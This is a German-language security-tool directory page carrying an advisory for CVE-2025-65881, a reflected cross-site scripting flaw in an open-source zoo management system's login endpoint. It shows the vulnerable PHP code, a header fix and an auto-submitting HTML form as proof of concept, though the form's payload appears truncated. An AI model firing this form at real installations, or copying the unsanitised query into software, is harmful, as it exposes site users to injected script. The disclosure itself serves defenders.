Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-65881 — Sourcecodester Zoo Management System v1.0 ist anfällig für Cross-Site-Scripting (XSS) in /classes/Login.php aufgrund eines ungültigen Content-Type. | Kitploit
Tools/GitHubGitHub/mmakingdom/cve-2025-65881
SchwachstellenanalyseCode-AnalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubmmakingdom/cve-2025-65881

CVE-2025-65881

Sourcecodester Zoo Management System v1.0 ist anfällig für Cross-Site-Scripting (XSS) in /classes/Login.php aufgrund eines ungültigen Content-Type.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-65881

Das Projekt Zoo Management System v1.00 ist anfällig für Cross-Site-Scripting (XSS) auf /zms/classes/Login.php?f=login aufgrund von:

  1. Ungültigem Content-type der JSON-Antworten auf /zms/classes/Login.php?f=login
  2. Unbereinigtem Benutzereingaben in den Antworten

Dies ermöglicht es nicht authentifizierten Angreifern, schädliches HTML/JS einzuschleusen, das in den Browsern der Opfer ausgeführt wird.

Betroffene Datei & Anfälliger Code

/zms/classes/Login.php

root@kitploit:~
return json_encode(array(
    'status' => 'incorrect',
    'last_qry' => "SELECT * from users where username = '$username' and password = md5('$password') "
));

Ursache

  1. Der Endpunkt setzt den Inhaltstyp nicht auf application/json.
  2. Der Parameter $username wird nicht bereinigt, wenn er in SQL-Abfragen oder in der Antwort reflektiert wird. Derselbe Fehler führte zuvor zu einer SQL-Injection-Schwachstelle (CVE-2025-7160)

Abhilfe

Fügen Sie diese Zeile in die Funktion login() ein:

root@kitploit:~
public function login(){
		header('Content-Type: application/json; charset=utf-8');
		extract($_POST);

header

Proof of Concept

root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="http://localhost/zms/classes/Login.php?f=login" method="post">
      <input type="hidden" name="username" value="awdawdawdawdawaaaa$" />
    <input type="hidden" name="password" value="awdawda" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

XSS

Referenzen

Der Quellcode kann hier kostenlos heruntergeladen werden:

https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html

Danksagung

Muntadhar M. Ahmed (almuntadhar0x01)

Tool herunterladen